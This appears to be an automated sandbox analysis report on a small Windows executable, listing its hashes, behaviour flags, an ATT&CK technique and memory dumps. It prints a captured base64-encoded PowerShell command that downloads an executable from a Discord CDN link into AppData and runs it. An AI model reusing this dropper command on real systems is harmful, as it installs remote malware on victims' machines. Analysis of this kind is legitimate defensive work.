066ebfdd51a06d63bbd31dd50a91feef08d87d9df1062686e321cda447081ce7

Analysis

max time kernel
36s
max time network
50s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
05/12/2022, 09:18

Target

9acb87e9bfc6721cadc2b6ddb80be20a.exe
Size

6KB
MD5

9acb87e9bfc6721cadc2b6ddb80be20a
SHA1

c9954ae3e541877fb9ddb1c467d6e20b9eb15db4
SHA256

066ebfdd51a06d63bbd31dd50a91feef08d87d9df1062686e321cda447081ce7
SHA512

ffebd124686f09a478a2aeed7dd3ca2c51460ad2f530d157ef377b62dfd5c5a7dd9d4eaf899fb1aa7f6928ad7cc33a5b3d6113e241150ed3752764a4bf18e657
SSDEEP

96:D779papL1bhycjEL/QVtZjvk+Q7AY1vsdsxvk+Q8vp9Od3oj2rl:DH9papL1bhycjm/gPvkCY1v5vk6bOdl

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
784	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	784	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1112 wrote to memory of 784	1112	9acb87e9bfc6721cadc2b6ddb80be20a.exe	29
PID 1112 wrote to memory of 784	1112	9acb87e9bfc6721cadc2b6ddb80be20a.exe	29
PID 1112 wrote to memory of 784	1112	9acb87e9bfc6721cadc2b6ddb80be20a.exe	29

C:\Users\Admin\AppData\Local\Temp\9acb87e9bfc6721cadc2b6ddb80be20a.exe
"C:\Users\Admin\AppData\Local\Temp\9acb87e9bfc6721cadc2b6ddb80be20a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcAB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADIANAA3ADcANAAxADcANgA2ADgAOAAwADgANwA4ADUALwAxADAANAAyADQANwA3ADYAMgA5ADAAMwAyADMAOAA2ADYANAAwAC8AVwBpAG4AZABvAHcAcwBTAGUAaQBzAHMAbwBuAE0AYQBuAGEAZwBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBjAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBsAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAGUAeABlACcAKQApADwAIwBwAG4AdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGgAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwB4AGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAGUAeABlACcAKQA8ACMAZQBnAHoAIwA+AA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:784

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/784-58-0x000007FEF4280000-0x000007FEF4CA3000-memory.dmp

Filesize
10.1MB

Download
memory/784-59-0x000007FEF3720000-0x000007FEF427D000-memory.dmp

Filesize
11.4MB

Download
memory/784-60-0x0000000002774000-0x0000000002777000-memory.dmp

Filesize
12KB

Download
memory/784-61-0x000000001B850000-0x000000001BB4F000-memory.dmp

Filesize
3.0MB

Download
memory/784-62-0x000000000277B000-0x000000000279A000-memory.dmp

Filesize
124KB

Download
memory/784-63-0x0000000002774000-0x0000000002777000-memory.dmp

Filesize
12KB

Download
memory/1112-54-0x0000000001030000-0x0000000001038000-memory.dmp

Filesize
32KB

Download
memory/1112-55-0x000007FEFBC61000-0x000007FEFBC63000-memory.dmp

Filesize
8KB

Download